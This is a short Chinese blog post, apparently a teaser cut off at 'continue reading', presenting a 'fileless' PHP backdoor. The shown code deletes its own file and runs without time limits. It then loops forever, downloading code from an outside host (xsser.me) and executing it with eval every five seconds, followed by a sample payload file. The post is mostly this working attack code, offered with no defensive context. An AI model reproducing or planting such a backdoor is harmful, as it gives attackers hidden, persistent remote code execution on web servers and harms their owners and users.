PHP 无文件后门

分类:安全 | 2013-10-9 | 撸过 1,566 次
5人扯谈

 

webshell.php

<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);

$remote_file = 'http://xsser.me/webshel.txt';
while($code = file_get_contents($remote_file)){
  @eval($code);
  sleep(5);
};
?>

eval.txt

file_put_contents('1.txt','hello world '.time())[......]

继续阅读